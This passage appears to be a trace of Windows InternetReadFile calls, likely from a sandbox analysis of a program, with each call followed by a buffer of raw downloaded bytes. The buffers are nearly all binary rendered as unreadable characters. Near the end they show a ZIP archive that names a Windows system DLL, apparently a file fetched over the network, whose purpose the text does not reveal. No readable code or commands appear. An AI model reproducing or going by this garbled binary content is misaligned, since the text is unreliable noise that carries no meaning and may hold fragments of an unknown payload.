Õõ¡O]è7éªC¾ÿººûh&à’Úú·Ú$ôï'˜úá¤ÀÞ@à qóüÄ9ð¡>µä> %ò·&ê vˆ®õñ‚¨$$ TÑyAœÜ ¾@T< { È½ñPoÒ§ Dñ†~¤ù3C¼Öï­ •òXo¨ï÷^ Õ½!yqdn$¹CWè—6$!Ôîˆlàc <Äéûx $¹¹`y ÍG‰ü[â±°!ë@âIï¾Ö $ÂÇ)BÄɼä:è^$=È÷ €fä·A.dYCȲ†¬IJºb N0HZ¤mÒ’N‚ ݑfë x¤³©’çïëO jр8ùAßß¹„k8²x ú$ÍTÉr›¬õô^“{]g)ÿªŽMɒ¹CT7¨íÏ×½ ’dU·î%¢“(&Ü·yl´¢‘ä{á n¤K`üݽ~^Õ?^S² ’íZC÷Àÿ²@˜|JY’¥€xúý`•´7¯nô‚~y‘}8‰*¢”4 ;`Tð<¢ DbƒÃ`:†’B’ç¦@CJZIJFT€Ãyª 2ȱÂÒ `@²€Æ!7]Ü`h;Êè^®0þZä? KÓ¹'yÄÍ1 ÙópÎ&‰Ss=\8xŠtœ“j Ã7Á`ád‰VHJ6¸•† d!U¨Ùhm\B¼ “‹€aID*6*sœ»`€;†ä%QhÙ6y»áC=(­@|P Þ…à ·ÚlœßÛ-½ýqh ‚‹ÊTKäç`ÀȃJ FANQVÁª*n¨‚±ÿˆdô -©Ž ¡a¢…EVküZÞA^8<JÛB¥ca¼ÔÖQDcµµäÐ2ZJPhuB¼¿œæ톉0Á †Q"Œ ²-œƒÕFfgÔ{j§‚Ψyˆ¼_\j:ÿxó¾™y³È9býÙOíõ±-{ú¤BÐmÇ6u Ÿ^bÒ˜š$°kÛPفâ—}¶zˆr&(²ôœ•Œ»ƒ¬|ëÞ±kìm\WoÐu*ÊkÚ¸ŒþÄ'Üaç¿Ð^¿
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ¨ª(Ì0ȧ'öb¹†‰‚»¾oN$ CÜÑäxÞ%(‘„HÏ»˜H*tNØ Ã!ph»Ž?<ó"¥—þð™槱Hãõ‘›­ÛžL|èOнû²µv¬@p•§;ìJÉô¢Á®6HG‰´;>»!{l¬<2×ka^L2˜ñÆU¥ƒD:ð÷VPtÕ¸·ü1L£Hy±ÕGa F‹‘SÂȬ¦±ßªÿ)ä›ØOš}N ¼qóò„×Å=هš˜Qaí“OZrÆC½JìcåL’Þ²nI<H³©æZï& ‘¦ýà©4hÍ´»  Û+‡¯´‰‘šƒIY¢Qø|YÔ;‡Ã>a]‚vôôB &ÛéeA’ÇҍÙÑÇMxwâvã4¯À¬Zž—Ê݊Øî³®9¶-¾‡4ü¨•Ø¯L‡ô¦Œe »ší~rÿ‹Ø«ðÆS•Èåí¨× ×ø ߶ˆÍæ¢;½™ ›ê ª2s‰¹§^ênÄ;«^½@Ñ;‡Ù¸†éú¾k®½CôŽ×¼ïpK×ßu)š¶¼kS½ûzª<=ÁÃê¹ÑÔ¬Nôº ¿ÒHØj¾C„”ïøfÜ*”°_¦“Eeùےg ´Iƒhi6  ‡ƒ;,*ÊËIºÊºb°Š ŠhVI-+ƒSB»b18´‚» ¨€Qr—•Ãzü‚]vŠªl‡ñÆUs!ìèûÒÿ\:™dÔhP ÊÿçÓÉ?ð&@ŽÉz¨Ÿö59¹\·ÈèSbR|Èò¹ »ª¦èÊàHk}©Å˜û›ý¼yŸQSÜeŽ¨¾MÅ8„¿ò’;Èx°ô”5•†EÁåùåÍVº¶[?]Tó»Mžò9×ø•=W)ME͂i,ýy–/²%EYæ'o0Pâ›âTöÒ+‚[^ßQ]˜-{ü܄g WŸ:.Ú çvɋCC9&&Hš³UŠ3±¾Õ¯½miC¬^wY<ÀÒoï‡qÌԖîtó'læØsQ0‹øŽ9Vÿ˜ýìLªë§á£"}"Ö Qêoï_>zK@¤ÒùÇ´![•¶È^‘LIóíY9pÿÍÄQ@†ž>Ô+P4’W)ƒ@"Òv=9AonH>D?ƒ`ìád° ¸ +â'DüŽ‡ ¨ÊcAYCz5+·Z•#Uÿu¼þ+(|ËènéYuwè `˜›Zº`í5®ý¼³ÉÖ¤¤8lŸ¿Îo•N]+â_\ć9%ÑΡÃ¥<Øfu°~?õ”ä IÎú†¾›©^w=jLäN½_mpí õóŽÃO}9R·§<U›ý*›aÓÍ·[ÿc…„Tw|Ú§×$ãm’•;t‡¦uõ8<,[yëøîZ¹Úà?yÞAɾÞ}®8mÏ¥­1÷»+rGUn+6µ4´¥µ‹¦š\aœŠa•3d=wËÜaþÜËþ£t;ßÆëu3ßl»øÂѹùš„CŽ¯“Î÷&þ@…v.™ŸD£B·ˆ”n°3mË:AéûEBâ;öý‡þ$üC¦ãwi’×ýѺ=y¬ÀÑÕ«K%õ„óYœwÿ§Ù-dµ±®¡<+óŸB¸?àMcϐ„F!cÓÀØS`lò7åH!ÀØXPeýVp;æoej /íè"­ej!íŽóp õ#HyüAõoÃá ,?Å·ám4'ÀŠªüÈ1W$T#½cç²öFŽü®›Šïw˜ -07Ὅ‰xÔ]öøˆjÓǂË4gJ‰§?É®Hl;Æ:2\ßYŸÒ2$[Ò[ýŠ¸õH.ðÊHtdZøüÉÌÄóûÆü<.öBÜÓÇ.¸šéxR©)ó§|ã9Z”ÔÏ=c¬)Î÷>&˜ÒAÈx“¯§5kQz› ôŽþúHåèò¸ªûØ杦bÖsNig«‚‹?U¯Wûù§.õƒq—˜ú}³Óžîßjv5q—YQ–_ˍ-»¸½Kž½j8Ð¥tñú弞ÇÒ¹§ç&/0kg»]¯ðN¤¼§›°—Sm¬‰O ;j.„nÒh¯ç3la_ž½,h $`óйè0‡.‹È“ñgºõ¨„È}P.³¬0×ó¹}‘-íQËËLÏ=ØcŸâ»^…Æçj¶·‰o¬ïeH>–ž¸ö®SìqÕï¥"v$ì¼°gH§‘Éõ×Ö§÷.¼57š §0‰o~N7“4¥IÓÅ6$d!(*«­üXÀE¾áø—z2®ÉE­'eœ‚ùÕ¯dàZÇ4DŽð¢_($j$J°3=sQNõr6ÿT/3/FýÝæØp՜~ NnS>Å´l~61%ŽˆCòŒï8UÌ«èY\ïé¡sQ‘xvjÛ{UuMLÑfêFëœzáÝfð3>‘8¿lHM¢Š Ö¾Dé3ú¤¹O(+=´ Cd‡üv!rì˜öoÃõ†"‹<"Œƒ”û\¹Iúÿã‰ôÆàR‰ú¸ÿ<zŸÜ9'z Þ.ÓbQ«'ß_éÜpLAüéUºä؁²¼Å¹ƒcIÂõµÊ‚Àyg[}½údXÙօÍçm>îKº«E»‡Ýšu—R¡ãŽûɖÛ÷ók˜%Î<GS¬ò[¨ÊY¨öh6Ý“]yÏ¿ú̊Cu~«´¯“C.'®)}êîC+ÁâÊÖóݛ’Om†QЀ¯r ǏÇÓ]”ÿÜœú |wÈ¡åö¡#GÌv/žæä0;¾½PÖye¸$ò~Ð{Á´pOÇæ}¡g3íŲ]çyߦWH!r¤bjºNùdë]´vJ»Ò:­N½Ûڕ ?5¦´x«‡å…6³Õv ê™È29µ¦vkKâ^º-q·Æö!eê¶åÙô@"›Ö7¥#PÌ&Ѿ¯;) fCA$^8 ñû0˜S¦¤[7f(&Â$!ÝBûFÚ7k¬ÚÑ"`¿ˆƒ?ÀÊÎø±À>­X P‰çeòl(šf¶ßäۚ߹{%Niw¿”þÈÉí€oYŒ¬9ó°8l./¶º(¶êß~ÓR+#–QÐÖ@+)@Qðß{Ó2Èع¶Ákk·îÚÒÄJ][øk‹ÁbdäåäÖ][¨*Kª‚ûþIEAáUIùþ(Ïö÷Û>†Úp–#ÛQ“Ël§ç—¢½S} –ÌÝÅ´1þóÔ>/ƒmNMwF\Ãn¨zH:Lo¶Cb¶hðp§ñ= aKÚçڕƒÚL3·ZjÑ?3ªV¤®ÔìM)}ڈ uŽÏëÅÞ¯vÆÚ:ëÎÚê%`ò\<O:ÅZ–w¦žj¸{nw— [ÀÖfîń˜š>—eÝ1>aOV<·À‘+®å»¿„oQ™¶ -­;¢i¤nÖŔC©ê=ïq‘®}àýCƒ/#Ymåf÷JÐb¦_Sž¼~˜Zn,‚÷êÛÌûÊo¤µ;?÷ʽ®ր¢I‰¸¿\{»U{÷ö…‰ Ñºc; idðOÛn·íŽG0'>hEíÓåi’ñ²÷·úÿŽíŽmÙ±%Mó¿È·¥=lÆ0Øܟ¡ŒP9S˜/X9q®cs«“b°ä뒍?XÙØäÑêÓ7ÿf:¢îޅ\‘¡ÅÚ)_KjI3¢6ëç›Ç:æœY„u¨«kd¿räXq\ÜÃ!—!lm@x¯ÉÜr¥>º9zVa¿½ïlf䮓æÀE&ŽyéÈX܋’*ßá{>¶í @maAåÎ)Dqz²xíõ/ȁ ³Ø]b_¬®H½>’$Sãê”Õc£þvæA¦Ç‰c+>®Ñ½M»èNŠ*Mrí v;%à'§°@y)zºÏ‰ˆsþrù–Ÿ§Î5Ó¦'Õår—!5㪫b²QU"#î“ sõÜìD˜öJ)ل_¤<”Èþ›Ëy–ö¬çŒzY1MïŸø~ÜôÀŽ`š¾Ý„ Aj——WMùëf€¾7ª¢”í 8½ˆ±Ov^Zx?àâ^Û~ž¦T©f²¹ý9ñþ>ß\u<Œ?æ3O¢„¥R…Ã˫̽‡BvPf Ç÷ËH±ŠÏߖ¶Xh)5~¹µº¼¤'½â¼fAk'—†Q¢DV!‹ø¸†€5ès‹šÏ<"ÍsOàŠ]UÙ+måÓ¦ÁÏò5Y y¿¶ièz ÞþÒ1jô™¡~·ÉÛ3ü\ŠÒµ¶RïòLå^¾§ãí®< ÇOýÛKùžÇNɯ ‡õY¡çHD4lø ‹2ƧÆé‰=À<ùô)ûùôùw!}ãŸY¬8ßþ̂|àü7þyN½>%}§( ?¯Êàá~gitL‰p̨!÷ÞuËê™dãý[>낷öµGåöÜõ´=%½dCy¶Põ,‡À—’•é6—º­_Ib­”汶{ïX¨¾¬ˆ^ºp°ªêrã`’€x¶e&.G¾_ç䌥£žiàª>æŒî>pùëË¡¤™Ž®tB,˓笵Y+߄z½È¡è•ájµ•†/:6_’GÁŽñ4ànÞÞUÑßäd¥þ5ˆ_jç`©xއ[†Ý[>û:‚RJ+R†©T›0Ľ„¨SÈíGÑ%IòÜ'iÅ©‚ç?÷(E!ïï-üR“k¥–~ýì,צÇAÂáD#ÉöõsŠ$Å5ßO¥É#²²ÚGg#Õ«›óºr´øDÊ<\~ulýhý Õû!w‹ùO.Àûç¼ð_½¾±ž,V±3Š˜žs”¥îªÒpFXÐ/;g4"ȟ§|¸8nç.Ít#hðúzòÒ×iL•÷t)7Ëâ’FÅè…/ð®¡&/÷ö¬mQÚ7k_w5-zžÊ¶ìQÛ%lÕÑO7ü Wi1^+ßÏN­¼i´8EPo蹩—oÔr˜?8ΫõÖí~Z"z>ԁ¯³t9k÷õËúJ™j %®Ï¥Z4ô}u„ӝƋÀ¸‹ãT¼yöD•Ü¹´Xèš:J­hۙ”=[ë+¸›W“±¯çõ叞¶ÜûÏÚO¼8éË’hãrÖ¿U#ˆ3cb?#e ñôˆVò¡Þ¶bâÈ©;˜¹QùDD(H„ï&îƒùÿ½áA-4…›{ u`T1g®ûO‚üRÍPf­×ç¼Ø0öVQl [ý¯LÒØ҂<I¬¼¼ZVKF­%§­ƒ‘ÅW')øã$Q¡x7ÊÈ%„Öò tóýé5œèÐ½ r2} ýd1XŒý:A\#€¡àŽïq&Fz ¤]c@rg©¡8¤¿RÄÀáœz«Í‘Ò¤fù ƒá¤|Ì·9lÍ£]cÀ>䜿þ›ÿ`̯þ¿§õaò“7ï0ûLLˆiý¦ñŽ¾
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ’ÇÇÄ9楞1âÒìF‹@³%,3õAÝ|í|̈́­˾!Ó¦@Å,W¡˜ò*Sùk(¶D§,í%®Ä/8 °SÝ-¡wa2@£[å3É"G8c8;éòÚh3ú¡vÓ×Û/ј“¢»Í2b„w”ªË]+<c3XS]ù)¢Ê8»eB3ºý3÷íâú3“ÙMëNôȶ»µ/ά)D[UØn3¦•óîýÛ7# B jÕÖYS8Ñx©"òúÔáctÓÃ&Ÿ’ ÚÇ9Šš´òßM&¦Iùgó}Z?…{àÙ!²è(ÐY˜T'Yáf­ShÞ9÷ò¤­õ@6\WGÎi¦ïü}2–0_”Æ1:éý¢¤Pæz«4 þpfÿ‡ÂÏk%ð*ÇÞíÚVÓóÌzüNxú:Ç6En§TÃÃèëe :ëß°qñ;„»2n1¼‰gI2õgá0Q᫥ ‡ØóÞ¯½áUàI››¨c‡òù ö³Ý'=IÅJ¯Ñr<­Ï‰ÊkgÊÕ<És‡ä¹ñ‚,ØÝgºôîßãyqYyï‹ÌS¡¹¥Œ_8$5ÊF瞕DëÕÐ9ëã5L.j½2y})4⣃ÿúŒÐ0‹åÀXÁ—1}¶2÷ŒE3nÙÝõ4»†Ó4%½›R“ÓÚ=Ê>¿Æ1gªð|‚W³º&ÔH/›æŽüÈ'vu·Ï}Œ\֓‘ õ‡ÀWýž®ýmÕë>³5œT¿×ðYôÎNf;ÃV©lFÿ I$ÓÒAøýv¿¹½¨ø½þŸÀoPT!ÄV”U)ø¡fåAJöŸsöÿ ½ó üʟö¤Híö•å}V7<Ҝi.jVÖ5°ÎDŒõMÏé£2ˆbŸ¤ëµLã2<Ư•r>Ôè|Ç#ë^%ұβ 3¦;„nˋí;1=ã¹^f>òÅ~‰&' Dqí‡>ëv3ÜÙyáÎE-dáÜ)¿Tχžèá.&ÜÛ '+Yš`jeÁ<ŠùâsäHØ÷Þ<ñyσã—Æ…ïùt—ã=ýœ¿E¥î‘<`›¾»äF3ÇGïÑÆn+œÛ{š]Ÿ“œ·÷µUøWX–€}<Àê½¾2(ªWsm™wA0\֑ýts\j ¼J`Mùülv¬Kd»åâMS#Ši½ÏA9ýŸÐû—~ðèͶ½! Æf,oì0öЯá·À­Èåo7O2[DwÁ¶üâ2£`Û:Yü¿õÿ’çéšíø&G„ŽÒÀËʲ°þ®scX¹,)ÈÁŸ™ã\×õÈäjÙûk “ü]«mà·MPf™»4†mj.Øf­&K(­ Ÿ>xçÕf؛áëɌ4­‡ †§p\¦çRF_òéix~lšV.ñò¨”˜Hà—ó£á™²kfé†kיœ8ìËHL«.PÍñD7›³L¸:nåÎ8ˆÚ:LLJëÀl ŨK™Z'Õã9ž62ºžzXÍ3ir0ºYQzçÉúÉÚ(&­Èû8¢ð°½&ïèãaäd¹ÛǙñAíª‡í%´Ü‹¹ø„sëñÇüJUîŒ¨?»n—ëÆ·…ÙhÃø\ÛÔý…ÈSL·djºµ/Í½Šª):CR¬6i]+ʤf‘d¯§ÍY{éÒEcÏÖ<­Å˜á˜\.Ðc\kíN¾Ö\á;Ú/¥_ÖÌtÈÜ„1’2s²Ÿ°~{j0óDû¦€ºXI-û›Páúlrƒ¤åårõĂP—JBÇ©ú³úSk`ý*¾>5oMmó¨;!°o­;\}Á.¹zTx¬êb»[e¸%Í}MY³Òc‹ÃÏ]ÊOá{œ²#DD{†žï$^Ÿÿvo»ðƒIAÓ¶¬7†C³0|@"ST«wësÂÄéã]˜‹,ÍŽŒù }–ËÝ*kÅíÛÆqrC–Dƒdɍp „–Û?w^þuÔä{9?ö帶l¿  óêP4$À÷†\]ÊE9 ®4Db P‘³1æß]t®ìrúNà9ãÖâå Ú·&ŒˆõYf™`3;åp3-e/KEOE¢I…¨c„3Vµ±·±±wÁ{`ñX¬E°¢‚:ä‚~ ùb1"¿|òÃۄ‘Ôoy˜7Á= ,ø§I†GG­ m žÜgnÂÔ¤GT›7”&ÕÁn“p ÌÊå*)›ŸjÖñ»îª_=
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: €Àº\@àï¶S‹ÉŒ’×± º,T´3͵¯dدêåäé}â$ô—µëü[ˆÞ§ßé!Tö6#êJŽ4è{ø;h×Û½ ïàè†X|rN¾=賣f‡®ßfՍùH’¸óüàê“<֑×^ÚÄy“dÚV:FǵpáTìùê(®áÆbWîٍƒyO:˜¿Èlxó!h…Oyûëi§sÈgªjîÐÉü8*ÎØt£·^~Üj‡f…‰ÆÃòs÷$îˆ{1ğ5p7¢WbB œ/ ‹…‚d¸Ø÷y¥Åá\‰jɇÿ±“ïßa¬²ãàºÕfÌôýµ êü[ †•§SŪ‚Šò hÿ+®ŸÆ|¸*pià“Øü\î»ç…È’Ÿ0žb+%—„JéL„?v}&OõWÁlÛNû²†¶¥¨îFÙ\êV­À±¾ØËÃ]ùº± ^@Ó/evˆÃ©å“5;üÝÝ| Ôä¾@†aHu¢§46¯ÍÝ¢¢lÝye4uÁ¦Öúz¤½)?WÆÌ]ՙ³×u÷u©¶LZÚÖJ¥=ÐÚÔHf·ËƒM\÷÷b‡•o8Ò(Ómà–•_Þc»#ó£û-9Ôý-þ»„jÖ!O[]Ë4·Ø•dlðD÷áU¯ûÌ:‘—W¸Ø£2¶Z˜_T?Ðc@*Ô2´,V9=tÿ€KhŠôŸTîœCÆÛLß®~M ºOàýף٢µ·ÕƒG%΋…õu­ï¡)É"Û¾/N$ CÙє~xß%" ‘D)ï»X)*tN0€áH8´Ü@ÇÞyQÂK¿}ç…ù©-e¡ˆÜcâc»=`©Û,ÕÉN¹ðŒlK²­=Ú,Of"ƒdFè8>½*zl¢ö.xfgQL1˜ÉêYe‚DÚó·÷Pbɸ…~Ó(J\léUƒQÆbU1òK!dì·ì¿#„|õ=÷Qó/©W®–MzÝ™½¯™ zûÕý֜‰¯ûXEÓÃÂ/×nŠI<Àð9b«ký­«@,XŽñ½§êx€5ëŽBB¯oŽ@i3 =«šT£Øéó‘÷íúžŠé‘t¢§fDµë8ŽÏ‹ø‘ü–nlŽ>nb;7™¤ydÕò÷©õª`{ó\sl[}÷iú‹tm-±_œ -HÏu5ßq¿sAòIXcÊ%äü&Ô`C¥ ÑËVÉé\t·7ëÉæú“…U™s¹äܔ>Cҍ½Dç-ÏÐ ŒÄ7±™Ô°^Þ]é:0ÂìXéÝ$Ì'WÔ£izÓ¾åæàëòô«GƯ§u£WŽð» „.Å;Ä)ñŽoÆ­N ûe8YBA°=yšÄxx‡–㐒çÁ9ìýËádyPEIQÚUÁƒUQVA㱪òhy¼*Ú‹Á£•ÝåAeŒª»‚"Öã‡Ìóy§ÈÀv”hR5#LÅ>[úß 'SŒ *£A¥ÿ~8ùÞ$è`²â*ÁAà§uM .×ͱ¸Fǔ˜ï³|ä½EKbqx¬­¾7îÅý"j}þ'DáGÔk¾óŽ¨§œÅ{xľ îSÜ˲·4ŚNWXöažËJÏvç³[ýnЇåÉ5ybÏ[ÊPQ3k˼çƒnë‚B OQ–ÅÑ+lc´Äk¯×©ùéÃ­ƒM[f§Ïß{dÊÿlÀ>.z{΍’ÇûFrLM‘ W¦1[hNÄúVzÛ2[ï½ì2·‡#¸'ÞÞ㘩#×íæOââÙyV$‹ü†-Ö0É~úÝ1×O5bÅ¥žŠ[¯‰ÔxÙ$jRv0KBcòiG¶© )\NMóí_ÜÓùbò ÏÌâ Á?’iA2Òv%8ÁlaDÝD?ƒ`ìþ¿d° ¸+ÿŠ‹øAPT‚ F™ÆP\Ê*R²ÿ8^ÿ¾dq7‹ð¬º9²Àå+µöšÐyÔÝlkZRºÛ_÷Ú=ՔÊ"Á¹9<y”çnò‚Ný8>µKÆjo}ýˆ¬ôMéuW · |¹è{î6& 묊Þ^yþQÇþ¾<Ç6¥vIl}õü«B†M¯ÀÏR²½ñ5v[?©”Ž#µK_Ú¬72¥gØÀãaÙ¶¾Nক« ñ“çUq”ÂàŽSÅi;Ïmˆéì­ÈCT¹Ý«àlmh= ÁhM÷j‘åuÌZE£µ§®[8|8Õ7tÉ ìA¼~/ÛՖñ³oú i[*¥rD×;éŽðq (ß敏ñI4>éãážÚ v§ ­@ᤑ§¿H|Ǿ_âÐ#ÿéøC˜d5Âõ~´¾<^èèêÕ£~ìˆÃî¬u7ÿ§Ù-dµ±.£+ÿßB¸ßð&±'(B£±i`l ›üM9²06T_é ãÆü¶+³í†rînÁrÚf89w¼‡KˆI֋äj|k±(U_£9fWåGõ¹" å;—å/²ðÔoÝdQÀ\h‚ùHomL7FÞ䎯6»'2Ïp¢”|ü“¢”Ìñ´µc£õÝõ©­# %ý±ÕOëw.ŒEG¤…Áᅴ|Ôi"ÈïRØh/Ê7•tÆÕ\ד~d«š`ê'0ž§UUãÔC–KÂNJ ¼“DR;H/ ôµ§q¥7XAïè¯wÅQþ.÷žÒõ>&2Þ ¡êæý§T ڔ]üép¼·O?pi¬Ž;Ç:䛝ö jƒùÅÄmæEY~­W„¶ñ±x—<|Ò°§Ç0ðìå²¢¾ÏçS O%¼:æ“ív¹Â;‘ö–^®u[Ǜ„{#çà¢èfÍÛõF­ÜoËs¢çE¶ pœŠuèÁE?Ñ{·_=Xñ½ÚyË }Ÿg9ÒîfïËô܉Mú¢ßó$$>g_‹½M|cýÀšä¤lôdå›nÉ{U;½?q#a§Å<ƒ»M/ÒXß5ûÒÂx&ŒÆ4¾åӻïµzքŽˆZ‡‹H(]o/O"œïӗwM.j;*ï$¨q!ß&2®%,~`=Úù±r¢f¢7ëCµc^ÎoègæÇh¼áŠ ے3„[Çg& ’–-è!Ï!©Ê¾O©Ë¤É©âƒº>îòÐX?“‹ºÔÙ.eû-Z˜"!6úFëœz±æð>wyîõ5;L)¤sŽÖçùý–§¢Yé!Í27tþç¥úŽiÿ4\ÿÖXåYä“a<”ØçŠCÈ‹Ä (Òÿ?‡HäV;—"H{W¯Èèi)$íýóD4¯jônGCùû­9Ô¸wÏÎæü«Â%~žMÎI¨1T\®«qvœï­‚1™qÒà ^oö)®;?d:½~“¹Ì§ËI“'Ïêëƒl*› ø6…<´ý3…ÎÜ%a³ôžu ={³(nÕîóü²íX;·ÊÎynûB^‹(º†çeÉö©F…~Í7ÇL²Ò?¸•œmÕ}÷´sÀØfÞXI£¾™JÏTµÇOBNE×&¦“tv¸±^) vŒ c‡']Ö$¨»d"°[àš&À‰ãÁÕyWpºÕ·nÝ4§õ2Æö†he[yb0žÏDG§Îq83'9„s»CÿÞ<½øŒ‰<볜]72†:Ö) sèƒdíoJG 7˜C¢}ŸwŠ́‚Hëá0ÄÝ`2L–iÅDØ O˜ “†t ­eÝ,³ÞkLj€ýÂîOAÆVbGk²Ö 5¥èìYËBÿêâGYßÍkÓ7¾=ñ¹Nk×Ù ‚ëÖq@+à[Ô« «¬ù“Ð^‹Ãfòc«‹b«þé/-u°òJhyeM´ª2äÿµ/-óÉ,·¡£mt´µ[9Ú2ÄJQ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ¶ðÁуÅÈ+)*®m¡¬% îþ[$•Å–$ø]œí¯lKÖԆ±؄z5ÏqüÃçhïc¾$K¶ÞbF€ÿåõn¯í2NÍMc.¡W¶xH;Lqá$‘!M~¾4.ŽÃ»]@»rP‡õóþ½–Ú̍«Uè/i ¤–>m$È'u×ܙø ÛY/挵u֛¶ÕOÀî$¹xuŠµ,ïN5Ji¸yjG aC ß\BLÍS—y½I1ϵD>ᶻ'š¹–ïXRŸ² )­; e¬aÞÚC»Å3úƒÇ DºÎž·w¶/ƲÚËÏLï’bÄLõ™Ð½¼Ÿ^q<|ýŗ™j/ät®žyâ^Wk@1¤†wÎ×ÞhÓÙ±“;Fc*b¼r°}idø?l{Ý69Ày¯¹[¿YÞË>Þßê¶?ló©[Ê0ÿEg[ºçûÍ× · el B¨Ÿ8Y piòTÇÌõnšá’¯ŸmüyÁKÍm>O?¼˜ ¯»u&W|d®öµ¯¥ ½´9Yg헫¸¤ŽçµB;444³Ÿ8ò,:ÎíäQ̳ÞNz«ÅÖz¡>º%zZ9Ê~ëúé̈mG-€ *¬<ä"bñKª|Gou}lßluÄDÔº_#ŠÓ“í6Ö^^@> ÌÃn“\°º ÷õòØaùW§¬~—ïº2=Ž$-ú¸F4oc:*1¬úŠw[Û‰Haÿ¦œ“…jŸ££Ò}Ž„Ÿò¿û,gN`^åѱ™–bÆô„¢º\¾óH­¸êª˜lT•ø˜û«Ù™ú=nv⬻dUmB ƒÎÒ`Mä¾æršývÖ#ý¬˜æ;§ï¼Š›z¶9ˆáéR†½KßE3Á€ºwπ§/0tE©›fñúáãŸÎœ›$îqñ +‰½}š¡TµæUËíGäJb§ÀLu<L0æ ¢”¥j…C_ë«Ì]û‚7Ó?Ï@O’—]»ñà 9KIáÙÖR“¾ Õå%ý駵 Ûºy5‡椲N²{€÷jHØíOÝ"?dã¿%|Á®êüµãfA î6[xÚ4ô ‚7:žYS¿Ãôå A^¹Ún[Ù·kòÍûÞ2H®ï½´GQþZŸRÿ=§äAÒ~õІó$#Vý‡Åy–&é‰ýÀêîsþçÝ矅ôÕÿf±´á|û7 ê†óoÜüÿtŸL‘k*J#~زÆýéóóqVR’qCî­Ë–Õï’M¢„¾è×wߎÌí¿éi›"÷Ù2†6ïä–<ᅒũv—º ÈÒm´±¶»šp[ú*¢?ŸÙ[UUÖ8|XØ ¼z—£4¤{ô¥£¾YÀeº§$4ÌÝ»§ìkßÈáw=éê¤XöûÖÖfí½ô"Äëq̀<o›­|ÎùyË9%d ,‰¿õƶ’ð¡f'+¯‚²Ã¥óß_7ê ßÛúÅפ‘ W]”5:Flj!ï"E¦ 7D‡—Vâ;ʸ‘.è×~µƒ¨qdçf‰“ 5¹V[Ó/çMórÞ  #Kß^Ù§øAŠ_ó}Wړ<¦  sp:B£º%¿'G[PX¼üÇÍåWÛÖÿpsæš½b·˜ÿÖæòÞ?Džÿìó•`±ºqøԌ£}O•¦3Ç<—tÊxLD0_mqœÁ6­tc¸MðúzôÜ ïqL•÷T)ûÜg͊çg¼À›FZëù6eÉDê\I¬}rÈÕ¬èÑ1ŽyÚ1«Ž!¦Ñ'øK¸‰Z¥!nzí ÎçÅ©r€òDCÿUýãÖý‚Aq^m×o 1’ÑBºKç³v\.«0TÍܺ¦Äõ‘l«f×ÙWï™XºÓDwöcœº7ÿNBdIÓ¹¹“®ÇžÓ«ØvΞ®õ‰’Ñæm6ñõ¼<ÿÑÓ¶‘¯;*Ï
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ~òñQ_ÞàÄí1.yÄ šë2&£Xh|ˆˆôi°ÒwôeŠÉc)MwÙøPdDH†ï :îÃÿ^÷ PœÂ÷×Ä.àVCY¼.×}§'IésÍHf­×—üØ0özQl [ý ÒÄG$VII­ -¯‡ÖVÔÑÅHƒ—)òã Q¸€¢eìL‚Zkû¸ùþôŠN „ë]EÖ±~sý0XyŒý A\&€!àæï~&Fùœ d\f@9ÎÒC?pHᏀÃ×é/GdÈQŠ•V5†Sâ1ßb T·5Ÿq™÷ˆsÁʳàޘ_ý qg۝äû/î5±ùLNJj_Ó|Ãܨ%öõnÎãÊVÝ À°!<½%÷òÅëÍ6϶”ܽóõ«@±£DV§‰àD­íƒ¢Mϙ§û£ï·é=⭲⮲9]½øì8°i¯è+) ÁUº1eiç ¯ùOÖ $ϳŠÙº/¿Úî"ó>î¹÷yU™µû®¯å/ÞYc—“÷—¾ù¥f‹0;Ñt2$+JZ÷±Jâq–Ï•ÙOÓ©×Â~}¯†ètb7M·^¬ Î*´•‡™ßb舌od¹Þ³É_<14&»#gý!²ü S¨-þia¯ö­“ÒMªy¥o¿pëйº‚dâ!Ÿ|:1døhá½£.¼ÔöÈðÛC͏ñ2,È·:8¶æ‡hÆâ_jê6íc: Ü´c6‡®­r[Ò2óÎ~‘ð©ÊÑëܬbgÆÄÞc»ÁØ0¶Éù«µ Æf€±1E{þT´Õ¶<}¤þ,v˜9œ—‡_!¸'°$°Mü§-‡J;ãªy…´P'J´?§êJºö*«æ–L:—e•°¯Ìä€ÀI†ßzÚZ§os9K«ö–ŽüøGb/º´| Xˋ…>Ë\æ¸öÖæéé‘”Ê ᱃‡çG½N$yY5‰ glô…‹2!ð΍šK—v;ߌŠsb:½ñ)¨Õt¿SÊTĒÿ#½¼FKT'_˜ÉV‰‰ &™Ù´Mþ†Â§ÓEØ¢wíú·¹kž}ß)ƒu!»W ÿæòôð†¹íÊ0ÑÎ#ç€'ò:Wµ9†Û)íÇοir^t>äZd.Gwý2DQjB+\¨µGg¸•“û†yLÞp²‚[‡·–˜;UaÀÿPK'²—MÇ%U•,8Uapi-ms-win-core-file-l1-1-0.dllì™yXW×ÀoP@ ‹"hÄ“²#¢H¸Ud€hœÛ¾**U‹»¸ *R©»V´u—ºTµŠkµ¯Š¨U±Š[_pÏLdû=Ï×çûçž_rï9çž9sî½'3ȱ‹!Ä>}Bh?ÒaèóikÝû 5ÚkqÞe?-ö¼KR–TÅÎ&”™„XÎN+J5; g9 ¶TÁÄ Ùr¥÷ìÜÙÒ­ÙÇïr«cë;áKµü©À—­£¾ÅËÖRßÅK5ýLJž(MÏ"í"Š¥Ñ‘mU¾­6žZDw±¢Y[¢nHsAÚÃÀš[d›Ž%j…:Â4ò7^4ÈG˜åÀ¦y°M«›çðÑÁµÈ:ýîù‡èôÁ6 ýïžj|ª¾m& òZéú6l„R= ‘ŽšcÐ&-™ÒaÍÓ¬Í!éÆH²š}ju PºB Ò?…aöíñ¢;ªçù^¿áB4 äâl)G®âL‘*8éJçdHe8GÆåp9˜g¶$M3ØF“/OB"V‹5±”´ôݦM›&IËD­óà‰kìÈkL¥ìàºÝ0.é*d‹-2ž6>mÜæðIÆ5¼™î]@>³Y ]*ð-°¸4½ìȀrà"ð ·Gh6p¨:;€ XœžÝ`}8°øx°{ (€U@ðà8BށåÀ>à&ðØ¡L` p h:!4 ˜l~lœLö·€·@¯^0ùÀÀL`p ø¸÷?@!P <¬Ùùc€i@1p¸ ¸C^âi@9p xtƒ¼xIÀàppƒüd[à=Ðräû[òâ$ӁíÀ-Àò¤s€½ÀCÀò̶¿ € äf0ø¨z@n€(N/?ȍ X\kȉLŠ_€ç 